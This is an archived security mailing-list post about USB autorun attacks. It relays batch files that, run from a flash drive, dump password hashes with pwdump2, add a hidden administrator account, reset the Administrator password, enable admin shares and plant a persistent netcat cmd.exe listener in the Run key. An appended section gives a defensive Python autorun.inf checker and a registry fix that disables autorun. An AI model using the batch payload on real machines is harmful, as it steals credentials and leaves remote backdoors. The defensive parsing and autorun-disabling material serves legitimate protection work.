Still, if the simplest solution (autorun) works (and it does...)... why over-complicate like we in the security field tend to do?
Attached is a proof-of-concept as made available by [EMAIL PROTECTED] for using autorun with USB.
This should work. As it was already released, I see nothing wrong with relaying it again (with due credit) here.
I'd strongly suggest that people read the (different) threads on the subject on the pen-test list; a lot of questions were answered there.
Gadi Evron.
-- Email: [EMAIL PROTECTED] Work: [EMAIL PROTECTED] Backup: [EMAIL PROTECTED] Phone: +972-50-428610 (Cell).
PGP key for attachments: http://vapid.reprehensible.net/~ge/Gadi_Evron.asc
ID: 0xD9216A06 FP: 5BB0 D3E2 D3C1 19B7 2104 C0D0 A7B3 1CF7 D921 6A06
GPG key for encrypted email: http://vapid.reprehensible.net/~ge/Gadi_Evron_Emails.asc
ID: 0x06C7D450 FP: 3B88 845A DF1F 4062 E5BA 569A A87E 8DB7 06C7 D450
--- Begin Message ---
In-Reply-To: <[EMAIL PROTECTED]>

I have been using this "attack" for some time now. Below are the batch files I use (test.bat, b.bat and autorun.inf; autorun.inf calls test.bat):

*********<BOF test.bat>
@echo off
:: start's switches go before the command; run b.bat in the background
@start /min /B b.bat
@exit
<EOF test.bat>

*********<BOF b.bat>
:: open Explorer on the stick's root so any console windows are hidden behind it
@explorer .
@echo off
::Displaying Computer Information for my reference
@echo %computername% %username% %date% %time% >> Essential\DumpIt\sam.txt
@Essential\DumpIt\pwdump2 >> Essential\DumpIt\sam.txt
::Adding a user for me :o)
@net user /add __system32__ .z,xmcnvb /fullname:"IPC User"
@net localgroup Administrators __system32__ /add
::Hide the Account from being shown on the welcome screen
@reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "__system32__" /t REG_DWORD /d 0 /f
::Enabling Admin Shares
@reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters /v AutoShareWks /t reg_dword /d 1 /f
::Changing Admin Password
@net user administrator .;[pl,mkoijnbhu
::Backdooring
@copy nc.exe <nc directory>
@cd c:
@cd <nc directory>
@reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Taskbr" /d "<nc directory>\nc.exe -L -d -p 80 -e cmd.exe" /f
@echo MYUSER: __system32__ .z,xmcnvb >> Essential\DumpIt\sam.txt
@echo Changed Admin Pass: .;[pl,mkoijnbhu >> Essential\DumpIt\sam.txt
@echo ******************************************** >> Essential\DumpIt\sam.txt
@cls
@exit
<EOF b.bat>

I have tried this using a flash memory and it works. What happens is that it opens Explorer showing the current directory so that it hides any shells that might appear, then it does a series of commands which I have documented above. To prevent against this I have a registry file I use to disable autorun altogether. Contact me if you need it at: mak_pen(at)hotmail(dot)com

Cheers....
>From: "Fred Gravel" <[EMAIL PROTECTED]>
>To: [EMAIL PROTECTED]
>Subject: Re: USB delivered attacks
>Date: Wed, 02 Jun 2004 20:02:14 +0000
>
>And after some searching ... autorun is possible on a USB storage device, as
>it is explained just below ...
>
>http://www.microsoft.com/whdc/device/storage/usbfaq.mspx
>Q: What must I do to trigger Autorun on my USB storage device?
>If you need to make a USB storage device that executes Autorun, the
>following two conditions must both be true:
>
>  - Media must be marked as removable.
>  - The device can be set to either static or removable.
>
>We associate the "removable" nature of a device with the bus that it resides
>on. This means that a disk on an Integrated Device Electronics (IDE) or SCSI
>bus would be considered fixed, whereas a disk on a USB or IEEE 1394 bus
>would be regarded as removable by default. PnP uses a bit in the
>DEVICE_CAPABILITIES structure to determine this. For more information, see
>the DEVICE_CAPABILITIES Plug and Play Structure in the Windows DDK, located
>at
>http://msdn.microsoft.com/library/default.asp?url=/library/en-us/kmarch/hh/kmarch/k112_22r6.asp.
>
>The "removable" nature of media is a property of the device. For example, in
>the case of a CD-ROM or a ZIP drive, the medium can be removed without the
>device itself going away, but on the other hand the medium and the disk
>cannot be separated on static storage PC cards. We obtain this information
>by using the StorageDeviceProperty request. For more information, see the
>STORAGE_DEVICE_DESCRIPTOR Storage Structure in the Windows DDK, located at
>http://msdn.microsoft.com/library/en-us/storage/hh/storage/k306_00qa.asp.
>
>----
>Also the autorun could be used in "cooperation" with the desktop.ini file
>included in the folder(s) on the USB storage device if needed...
--- End Message ---
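The autorun.inf itself is not in the post above, so here is an added example (mine, not mak_pen's, Fred's or anything from the pen-test thread) of the triage a responder can run against a stick before trusting it: parse the [autorun] section and list every directive Windows would feed to ShellExecute. The sample autorun.inf in the block is constructed to mirror the thread's setup (autorun.inf launching test.bat) and adds the shell\explore\command / shell\open\command overrides; the function names and the extension list are my own assumptions.

```python
"""Triage an autorun.inf before an untrusted USB stick is mounted on a box
where autorun is still enabled.  Added example for this thread; it is not
the poster's code.  SAMPLE_AUTORUN_INF is constructed to mirror the
thread's setup (autorun.inf calling test.bat), not copied from the post."""
import configparser

# Constructed sample.  The shell\<verb>\command lines show the variant where
# the Explore/Open verbs are hijacked so that even choosing "Open folder to
# view files" in the AutoPlay dialog runs the payload.
SAMPLE_AUTORUN_INF = r"""; constructed sample, not the poster's file
[autorun]
open=test.bat
icon=%SystemRoot%\system32\SHELL32.dll,4
label=USB Drive
shellexecute=test.bat
shell\explore\command=test.bat
shell\explore=&Explore
shell\open\command=test.bat
action=Open folder to view files
"""

LAUNCH_KEYS = {"open", "shellexecute"}
# Assumed list of extensions worth flagging; extend for your environment.
EXEC_EXTS = (".bat", ".cmd", ".exe", ".com", ".vbs", ".js", ".wsf", ".scr", ".pif")


def parse_autorun(text):
    """Return {'<section>:<key>': command} for every directive Windows would
    hand to ShellExecute: open=, shellexecute=, and any shell\\<verb>\\command=
    override.  Icon/label/action lines are ignored."""
    # strict=False: attacker-written files often repeat keys (last one wins);
    # interpolation=None: '%SystemRoot%' must not be treated as a variable.
    cp = configparser.ConfigParser(strict=False, interpolation=None,
                                   delimiters=("=",))
    cp.read_string(text)
    found = {}
    for section in cp.sections():
        # [autorun], [autorun.amd64] etc. are all honoured by Windows
        if not section.lower().startswith("autorun"):
            continue
        for key, value in cp.items(section):   # keys come back lower-cased
            if key in LAUNCH_KEYS or (key.startswith("shell\\")
                                      and key.endswith("\\command")):
                found[f"{section}:{key}"] = value.strip()
    return found


def suspicious_launches(text):
    """Subset of parse_autorun() whose command runs a script/executable, plus
    the Explore/Open verb overrides that make the 'safe' menu choice run the
    payload regardless of what it points at."""
    hits = {}
    for where, cmd in parse_autorun(text).items():
        target = cmd.split()[0].strip('"').lower() if cmd else ""
        verb_hijack = where.endswith(("\\explore\\command", "\\open\\command"))
        if target.endswith(EXEC_EXTS) or verb_hijack:
            hits[where] = cmd
    return hits


def verdict(text):
    """'block' if anything would auto-launch a program, else 'allow'."""
    return "block" if suspicious_launches(text) else "allow"


if __name__ == "__main__":
    for where, cmd in suspicious_launches(SAMPLE_AUTORUN_INF).items():
        print(f"{where:32} -> {cmd}")
    print("verdict:", verdict(SAMPLE_AUTORUN_INF))
```

Run against the stick's root and every open=, shellexecute= and shell\<verb>\command= line is listed with a verdict. The registry fix mak_pen alludes to is normally NoDriveTypeAutoRun = 0xFF (REG_DWORD) under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer, with the HKCU twin for per-user policy; on XP-era systems that stops the automatic launch, but a shell\open\command override could still fire when the drive was double-clicked in Explorer, which is why the parser flags those verbs separately from plain open= lines.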
